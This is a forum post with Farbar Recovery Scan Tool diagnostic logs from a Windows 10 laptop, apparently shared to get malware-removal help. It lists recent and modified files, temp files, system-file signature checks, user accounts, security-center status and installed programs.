2016-11-24 18:38 - 2016-11-24 19:02 - 00000000 ____D C:\Gravity
2016-11-23 18:56 - 2016-11-23 20:46 - 1324021267 _____ C:\Users\taurus silver\Downloads\Part 2 MATLAB R2015a (x64) [JawadAhmadNagi.WordPress.com].rar
2016-11-23 18:56 - 2016-11-23 20:37 - 1118681574 _____ C:\Users\taurus silver\Downloads\Part 4 MATLAB R2015a (x64) [JawadAhmadNagi.WordPress.com].rar
2016-11-23 18:56 - 2016-11-23 20:14 - 1094046702 _____ C:\Users\taurus silver\Downloads\Part 3 MATLAB R2015a (x64) [JawadAhmadNagi.WordPress.com].rar
2016-11-19 20:32 - 2016-11-19 20:32 - 00000000 ____D C:\Users\taurus silver\Documents\Elder Scrolls Online
2016-11-19 20:32 - 2016-11-19 20:32 - 00000000 ____D C:\ProgramData\Elder Scrolls Online
2016-11-19 19:56 - 2016-11-19 19:56 - 00000000 ____D C:\WINDOWS\jre
2016-11-19 13:56 - 2016-11-28 04:31 - 00000000 ____D C:\Users\taurus silver\AppData\LocalLow\Mozilla
2016-11-19 04:02 - 2016-11-19 04:02 - 00000003 _____ C:\Users\taurus\HRUPPROG.TXT
2016-11-19 04:02 - 2016-11-19 04:02 - 00000003 _____ C:\Users\taurus\HRUPPROG.EXIT
2016-11-19 04:02 - 2016-11-19 04:02 - 00000000 ____D C:\Users\taurus
2016-11-13 16:28 - 2016-11-13 16:28 - 00000000 ____D C:\Users\taurus silver\AppData\Local\__Ž
2016-11-13 16:27 - 2016-11-13 19:09 - 00000000 ____D C:\Program Files (x86)\Blue Eye Macro
2016-11-13 16:27 - 2016-11-13 19:00 - 00000000 ____D C:\Users\taurus silver\Documents\BlueEye
2016-11-13 16:27 - 2016-11-13 17:14 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blue Eye Macro
2016-11-13 16:27 - 2016-11-13 16:27 - 00000000 ____D C:\ProgramData\Isolated Storage
2016-11-13 15:50 - 2016-11-13 15:50 - 00000000 ____D C:\AeriaGames
2016-11-12 03:18 - 2016-11-12 03:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-11-08 06:49 - 2016-11-08 06:49 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2016-11-08 06:49 - 2016-11-08 06:49 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2016-11-08 06:49 - 2016-11-08 06:49 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2016-11-08 06:49 - 2016-11-08 06:49 - 00042096 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-28 04:38 - 2015-07-03 03:36 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\DMCache
2016-11-28 04:34 - 2015-05-25 17:22 - 00004162 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{33D31F93-B81B-40A8-BF53-0277B390E224}
2016-11-28 04:33 - 2016-09-20 18:53 - 00000330 _____ C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job
2016-11-28 04:33 - 2016-06-29 03:26 - 00000500 _____ C:\WINDOWS\Tasks\UCBrowserUpdater.job
2016-11-28 04:32 - 2015-05-29 00:14 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-11-28 04:31 - 2016-08-27 23:19 - 00000000 ____D C:\ProgramData\ASUS Smart Gesture
2016-11-28 04:31 - 2016-05-17 22:57 - 00000946 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job
2016-11-28 04:31 - 2016-03-08 18:57 - 00000402 _____ C:\WINDOWS\Tasks\DriverToolkit Autorun.job
2016-11-28 04:31 - 2015-12-24 12:04 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-11-28 04:31 - 2015-07-14 22:47 - 00000930 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-28 04:31 - 2015-02-03 07:21 - 00000165 _____ C:\Users\taurus silver\AppData\Roaming\sp_data.sys
2016-11-28 04:31 - 2015-02-03 07:18 - 00000000 __SHD C:\Users\taurus silver\IntelGraphicsProfiles
2016-11-28 04:30 - 2016-10-21 22:11 - 00000000 ____D C:\Program Files (x86)\Hi-Rez Studios
2016-11-28 04:30 - 2015-12-24 12:28 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-11-28 04:30 - 2015-12-24 12:05 - 00000000 ____D C:\ProgramData\NVIDIA
2016-11-28 04:30 - 2015-10-30 14:28 - 01572864 ___SH C:\WINDOWS\system32\config\BBI
2016-11-28 04:29 - 2015-07-14 22:47 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-28 04:28 - 2015-12-24 12:27 - 00880884 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-11-28 04:28 - 2015-10-30 15:21 - 00000000 ____D C:\WINDOWS\INF
2016-11-28 04:20 - 2016-05-12 10:48 - 00262792 _____ (ESET) C:\WINDOWS\system32\Drivers\eamonm.sys
2016-11-28 04:20 - 2016-05-12 10:48 - 00208520 _____ (ESET) C:\WINDOWS\system32\Drivers\epfw.sys
2016-11-28 04:20 - 2016-05-12 10:48 - 00199304 _____ (ESET) C:\WINDOWS\system32\Drivers\edevmon.sys
2016-11-28 04:20 - 2016-05-12 10:48 - 00197248 _____ (ESET) C:\WINDOWS\system32\Drivers\ehdrv.sys
2016-11-28 04:20 - 2016-05-12 10:48 - 00084616 _____ (ESET) C:\WINDOWS\system32\Drivers\epfwwfp.sys
2016-11-28 04:20 - 2016-05-12 10:48 - 00061568 _____ (ESET) C:\WINDOWS\system32\Drivers\epfwlwf.sys
2016-11-28 04:19 - 2016-05-12 10:48 - 00015488 _____ (ESET) C:\WINDOWS\system32\Drivers\eelam.sys
2016-11-28 04:18 - 2016-05-17 22:57 - 00000950 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job
2016-11-28 04:10 - 2015-07-27 07:25 - 00000000 ____D C:\Program Files (x86)\Steam
2016-11-28 04:10 - 2015-07-03 05:19 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\vlc
2016-11-28 04:09 - 2016-09-24 14:04 - 00000968 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001UA.job
2016-11-28 04:04 - 2015-10-30 15:24 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-11-28 03:52 - 2016-04-04 18:43 - 00000320 _____ C:\WINDOWS\Tasks\{55FE86CA-FBAA-C670-0400-2FA61B21F28E}.job
2016-11-28 03:35 - 2015-12-24 12:09 - 00000000 ____D C:\Users\taurus silver
2016-11-28 03:34 - 2015-12-17 10:49 - 00000000 ____D C:\Program Files (x86)\DLL Suite
2016-11-28 03:32 - 2015-07-03 03:36 - 00000000 ____D C:\Users\taurus silver\Downloads\Compressed
2016-11-28 03:17 - 2016-08-24 22:56 - 00000000 ____D C:\Users\taurus silver\AppData\Local\Impksoft
2016-11-28 03:17 - 2016-08-24 22:56 - 00000000 ____D C:\Users\taurus silver\AppData\Local\Atcwworks
2016-11-28 03:11 - 2016-08-27 04:38 - 00000000 ____D C:\Program Files (x86)\Spyware Terminator
2016-11-28 03:00 - 2014-12-04 00:57 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-11-28 03:00 - 2014-12-04 00:57 - 00000000 ____D C:\ProgramData\WildTangent
2016-11-28 02:17 - 2016-08-29 09:21 - 00131584 ___SH C:\Users\taurus silver\Desktop\Thumbs.db
2016-11-28 01:23 - 2016-03-21 05:34 - 00000000 ____D C:\WINDOWS\SysWOW64\directx
2016-11-28 01:22 - 2015-07-09 15:12 - 00040448 ___SH C:\Users\taurus silver\Downloads\Thumbs.db
2016-11-28 00:37 - 2016-01-09 21:03 - 00000000 ____D C:\Program Files (x86)\Tencent
2016-11-28 00:36 - 2016-09-16 23:29 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WhatsApp
2016-11-27 23:33 - 2016-09-20 18:53 - 00002684 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdaterCore
2016-11-27 23:03 - 2015-12-26 01:37 - 00000000 ____D C:\ProgramData\ProductData
2016-11-27 20:48 - 2015-07-20 04:59 - 00000000 ____D C:\Users\taurus silver\Desktop\Games
2016-11-27 05:27 - 2015-10-30 15:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-11-27 05:25 - 2016-07-24 04:16 - 00000000 ____D C:\KMPlayer
2016-11-27 05:05 - 2015-10-30 15:24 - 00000000 ____D C:\Program Files\WindowsApps
2016-11-27 04:51 - 2015-05-29 00:14 - 00000892 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-11-26 18:18 - 2016-06-29 03:26 - 00003540 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdater
2016-11-26 15:02 - 2015-02-03 07:18 - 00000000 ____D C:\Users\taurus silver\AppData\Local\Packages
2016-11-26 04:06 - 2016-09-24 02:00 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\uTorrent
2016-11-26 01:43 - 2015-08-07 03:35 - 00000000 ____D C:\Users\taurus silver\AppData\Local\Warframe
2016-11-26 01:37 - 2015-08-03 13:49 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-11-25 23:15 - 2015-12-27 18:42 - 00000000 ____D C:\Users\taurus silver\Documents\My Games
2016-11-25 23:14 - 2016-10-21 22:28 - 00000000 ____D C:\Users\taurus silver\AppData\Local\HirezLauncherUI
2016-11-24 22:20 - 2016-09-24 13:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-11-24 21:02 - 2013-08-22 21:25 - 00000192 _____ C:\WINDOWS\win.ini
2016-11-24 18:47 - 2016-08-12 20:14 - 00051024 _____ (SoftEther Corporation) C:\WINDOWS\system32\Drivers\SeLow_x64.sys
2016-11-24 18:47 - 2016-08-12 20:13 - 00143816 _____ (SoftEther VPN Project at University of Tsukuba, Japan.) C:\WINDOWS\system32\vpncmd.exe
2016-11-24 18:45 - 2015-06-18 23:40 - 00000000 ____D C:\Users\taurus silver\Desktop\uitm
2016-11-24 18:38 - 2016-03-22 08:57 - 00000000 ____D C:\ProgramData\Solid State Networks
2016-11-23 14:09 - 2016-09-24 14:04 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001Core.job
2016-11-19 13:55 - 2016-09-24 13:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-11-19 09:13 - 2016-10-24 06:25 - 00000000 ____D C:\Users\taurus silver\Desktop\New Folder (3)
2016-11-19 09:10 - 2015-06-22 14:30 - 00000000 ____D C:\Users\taurus silver\AppData\Local\CrashDumps
2016-11-19 04:05 - 2016-08-21 21:58 - 00000000 ____D C:\Users\taurus silver\Desktop\FYP2
2016-11-17 20:24 - 2016-06-29 03:25 - 00000000 ____D C:\Program Files (x86)\UCBrowser
2016-11-13 22:00 - 2015-10-17 14:30 - 00000000 __SHD C:\WINDOWS\SysWOW64\AI_RecycleBin
2016-11-12 19:10 - 2015-05-28 23:20 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Skype
2016-11-12 03:18 - 2016-05-17 22:57 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-11-10 15:13 - 2016-05-17 22:57 - 00004010 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineUA
2016-11-10 15:13 - 2016-05-17 22:57 - 00003778 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineCore
2016-11-10 14:30 - 2016-05-15 12:14 - 00002274 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-09 11:33 - 2016-04-17 21:45 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\IDM
2016-11-08 20:32 - 2015-10-30 15:24 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-11-08 20:32 - 2015-10-30 15:24 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-11-08 20:32 - 2015-05-29 00:14 - 00003994 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2016-11-08 02:27 - 2015-09-10 02:26 - 00000000 ____D C:\Users\taurus silver\Documents\PlagiarismCheckerX
 
==================== Files in the root of some directories =======
 
2016-10-24 06:26 - 2016-10-24 06:26 - 0000000 _____ () C:\Users\taurus silver\AppData\Roaming\main.db
2014-11-29 22:40 - 2014-11-29 22:40 - 0025214 _____ () C:\Users\taurus silver\AppData\Roaming\md.owg
2014-11-29 22:40 - 2014-11-29 22:40 - 0000518 _____ () C:\Users\taurus silver\AppData\Roaming\orniiqo.km
2014-11-29 22:40 - 2014-11-29 22:40 - 0018582 _____ () C:\Users\taurus silver\AppData\Roaming\pble.hp
2016-07-03 04:52 - 2016-07-03 04:52 - 3167251 _____ () C:\Users\taurus silver\AppData\Roaming\sb203.dat
2016-06-25 00:55 - 2016-06-25 00:55 - 3163155 _____ () C:\Users\taurus silver\AppData\Roaming\sb234.dat
2016-06-17 00:53 - 2016-06-17 00:53 - 3255827 _____ () C:\Users\taurus silver\AppData\Roaming\sb78.dat
2015-02-03 07:21 - 2016-11-28 04:31 - 0000165 _____ () C:\Users\taurus silver\AppData\Roaming\sp_data.sys
2016-04-04 19:43 - 2016-08-06 00:52 - 0000243 _____ () C:\Users\taurus silver\AppData\Roaming\WB.CFG
2014-11-29 22:40 - 2014-11-29 22:40 - 0022486 _____ () C:\Users\taurus silver\AppData\Roaming\xlcjrlfj.qilo
2016-04-03 18:05 - 2016-04-03 18:15 - 0000126 _____ () C:\Users\taurus silver\AppData\Local\Autosofted License.txt
2015-07-26 07:51 - 2015-07-26 07:51 - 0000017 _____ () C:\Users\taurus silver\AppData\Local\resmon.resmoncfg
2014-11-29 22:40 - 2014-11-29 22:40 - 0010134 _____ () C:\Users\taurus silver\AppData\Local\rvwsegs.fol
2015-09-10 02:23 - 2015-09-10 02:23 - 0000362 _____ () C:\Users\taurus silver\AppData\Local\winconf.pxt
2015-09-19 22:52 - 2015-09-19 22:52 - 0000000 _____ () C:\Users\taurus silver\AppData\Local\{A34834BC-0669-4124-A49F-E789001372E2}
2015-12-24 12:05 - 2015-12-24 12:05 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-04-14 15:01 - 2016-04-14 15:01 - 0000121 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2015-02-03 07:08 - 2014-03-26 09:11 - 0000137 _____ () C:\ProgramData\RefreshReg.vbs
2014-12-04 00:56 - 2014-03-27 04:50 - 0000124 _____ () C:\ProgramData\SetStretch.cmd
2014-12-04 00:56 - 2009-07-22 18:04 - 0024576 _____ () C:\ProgramData\SetStretch.exe
2014-12-04 00:56 - 2012-09-07 19:37 - 0000103 _____ () C:\ProgramData\SetStretch.VBS
2015-09-17 06:33 - 2015-09-17 06:33 - 0000102 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
2016-03-31 15:39 - 2016-03-31 15:39 - 0001234 _____ () C:\ProgramData\~0022E94E_src020.tmp
 
Files to move or delete:
====================
C:\ProgramData\RefreshReg.vbs
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
C:\Windows\Tasks\{55FE86CA-FBAA-C670-0400-2FA61B21F28E}.job
 
 
Some files in TEMP:
====================
C:\Users\taurus silver\AppData\Local\Temp\4e6cf5d72520e51ea54dbf30164d13e3.dll
C:\Users\taurus silver\AppData\Local\Temp\5afbc9abdc05aab6ad80840a9f417d99.dll
C:\Users\taurus silver\AppData\Local\Temp\991b1d78cb2c4c9cf81c2891f02350d2.dll
C:\Users\taurus silver\AppData\Local\Temp\AcDeltree.exe
C:\Users\taurus silver\AppData\Local\Temp\d3f6565ec849e52ee65f426ca3c30f9d.dll
C:\Users\taurus silver\AppData\Local\Temp\FreemakeVideoConverterFull.exe
C:\Users\taurus silver\AppData\Local\Temp\Gw2.exe
C:\Users\taurus silver\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe
C:\Users\taurus silver\AppData\Local\Temp\HiRezLauncherControls.dll
C:\Users\taurus silver\AppData\Local\Temp\HssInstaller.exe
C:\Users\taurus silver\AppData\Local\Temp\jre-8u71-windows-au.exe
C:\Users\taurus silver\AppData\Local\Temp\jre-8u73-windows-au.exe
C:\Users\taurus silver\AppData\Local\Temp\jre-8u77-windows-au.exe
C:\Users\taurus silver\AppData\Local\Temp\KMP_4.1.3.3.exe
C:\Users\taurus silver\AppData\Local\Temp\nvSCPAPI.dll
C:\Users\taurus silver\AppData\Local\Temp\nvSCPAPI64.dll
C:\Users\taurus silver\AppData\Local\Temp\nvSCPAPISvr.exe
C:\Users\taurus silver\AppData\Local\Temp\nvStInst.exe
C:\Users\taurus silver\AppData\Local\Temp\selfupdt.exe
C:\Users\taurus silver\AppData\Local\Temp\SkypeSetup.exe
C:\Users\taurus silver\AppData\Local\Temp\temp~.DLL
C:\Users\taurus silver\AppData\Local\Temp\temp~.EXE
C:\Users\taurus silver\AppData\Local\Temp\Uninstaller-6324.exe
C:\Users\taurus silver\AppData\Local\Temp\UnSigner.exe
C:\Users\taurus silver\AppData\Local\Temp\vlc-2.2.4-win32.exe
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
nointegritychecks: ==> "IntegrityChecks" is disabled. <===== ATTENTION
 
 
LastRegBack: 2016-11-28 00:52
 
==================== End of FRST.txt ============================


#3
uwek007

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-11-2016
Ran by taurus silver (28-11-2016 04:39:43)
Running from C:\Users\taurus silver\Downloads\Programs
Windows 10 Home Single Language Version 1511 (X64) (2015-12-24 04:36:18)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3880736737-1765239813-1450978002-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3880736737-1765239813-1450978002-503 - Limited - Disabled)
Guest (S-1-5-21-3880736737-1765239813-1450978002-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3880736737-1765239813-1450978002-1003 - Limited - Enabled)
taurus silver (S-1-5-21-3880736737-1765239813-1450978002-1001 - Administrator - Enabled) => C:\Users\taurus silver
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: ESET Smart Security 9.0.408.0 (Enabled - Out of date) {EC1D6F37-E411-475A-DF50-12FF7FE4AC70}
AS: ESET Smart Security 9.0.408.0 (Enabled - Out of date) {577C8ED3-C22B-48D4-E5E0-298D0463E6CD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: ESET Personal firewall (Enabled) {D426EE12-AE7E-4602-F40F-BBCA8137EB0B}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
ACA & MEP 2017 Object Enabler (Version: 7.9.45.0 - Autodesk) Hidden
ACAD Private (Version: 21.0.52.0 - Autodesk) Hidden
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Flash Player 23 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Akamai) (Version:  - Akamai Technologies, Inc)
Arduino (HKLM-x32\...\Arduino) (Version: 1.6.5-r5 - Arduino LLC)
ASUS FlipLock (HKLM\...\{7C7F8DAC-8ADA-4B86-BCB6-48B6FFB673DD}) (Version: 1.0.6 - ASUS)
ASUS Product Demo Kit (HKLM-x32\...\{1714AD6E-D517-40C0-9B19-4CE0078F7694}) (Version: 2.0.6 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.13 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 3.05.0001 - ASUS)
ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 4.0.2 - ASUS)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0037 - ASUS)
AutoCAD 2017 - English (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 Language Pack - English (Version: 21.0.52.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk)
Autodesk App Manager 2016-2017 (HKLM-x32\...\{C0954809-F5DC-426C-847E-8409DE14E4C0}) (Version: 2.2.0 - Autodesk)
Autodesk AutoCAD 2017 - English (HKLM\...\AutoCAD 2017 - English) (Version: 21.0.52.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.5 (HKLM-x32\...\{8600F844-9AA5-412E-B6F2-F9C6CBCFD268}) (Version: 1.2.5.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2017 Add-in 64 bit (HKLM\...\{276A67E0-71EB-4827-B5F7-2ACF02BC1A5B}) (Version: 4.37.6853 - Autodesk)
Autodesk Desktop App (HKLM-x32\...\Autodesk Desktop App) (Version: 6.2.0.174 - Autodesk)
Autodesk Featured Apps 2016-2017 (HKLM-x32\...\{27C15055-713B-4D0E-881F-19598A2DFD59}) (Version: 2.2.0 - Autodesk)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk)
Autodesk ReCap 360 (HKLM\...\Autodesk ReCap 360) (Version: 3.0.0.52 - Autodesk)
Autodesk ReCap 360 (Version: 3.0.0.52 - Autodesk) Hidden
AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.5.143 - AVG Technologies)
BitRaider Streaming Client (HKLM-x32\...\BitRaider Streaming Client) (Version: 1.3.3.4098 - BitRaider, LLC)
Blue Eye Macro 2.61 (HKLM-x32\...\Blue Eye Macro) (Version: 2.61 - )
Cheat Engine 6.5 (HKLM-x32\...\Cheat Engine 6.5_is1) (Version:  - Cheat Engine)
Chromium (HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Chromium) (Version: 46.0.2470.0 - Chromium)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dassault Systemes Software B18 (HKLM\...\Dassault Systemes B18_0) (Version:  - )
Dassault Systemes Software Prerequisites x86-x64 (HKLM\...\{CF1EB598-B424-436A-B15F-B763846BA970}) (Version: 8.1.3 - Dassault Systemes)
Dassault Systemes Software VC9 Prerequisites x86-x64 (HKLM\...\{F2F2DEA7-36AB-4E13-907C-D8BDE775EF97}) (Version: 9.1.2 - Dassault Systemes)
Dev-C++ (HKLM-x32\...\Dev-C++) (Version: 5.11 - Bloodshed Software)
Device Setup (HKLM-x32\...\{1F07F2C7-596F-4F34-B805-2C61A3E50E5A}) (Version: 1.0.18 - ASUSTek Computer Inc.)
DLL Suite 9.0 (HKLM-x32\...\{E557052E-9828-40E4-BFF6-311D3E89DB81}_is1) (Version: 9.0.0.0 - )
Dropbox (HKLM-x32\...\Dropbox) (Version: 14.4.19 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.57.1 - Dropbox, Inc.) Hidden
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
ESET Smart Security (HKLM\...\{BA1050B5-E274-4693-8A67-CAF5576A07F1}) (Version: 9.0.381.0 - ESET, spol. s r.o.)
ExpressCache (HKLM\...\{44EAE7F6-8BBF-4C3F-A573-3CD5A3C067FA}) (Version: 1.3.110.0 - Condusiv Technologies)
Freemake Video Converter version 4.1.9 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.9 - Ellora Assets Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.7.4 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1016 - Intel Corporation)
Intel® Chipset Device Software (x32 Version: 10.0.20 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4013 - Intel Corporation)
Intel® Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 1.1.226.0 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.1.3.3 - PandoraTV)
Logitech Gaming Software 5.10 (HKLM\...\{1444D2EE-C7AD-44A8-844F-2634B49353D1}) (Version: 5.10.127 - Logitech)
Macro Recorder 5.8.0 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.8.0 - Jitbit Software)
Maxx Audio Installer (x64) (Version: 1.6.4882.94 - Waves Audio Ltd.) Hidden
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.4229.1002 - Microsoft Corporation)
Microsoft Project Professional 2016 - en-us (HKLM\...\ProjectProRetail - en-us) (Version: 16.0.4229.1002 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visio Professional 2016 - en-us (HKLM\...\VisioProRetail - en-us) (Version: 16.0.4229.1002 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
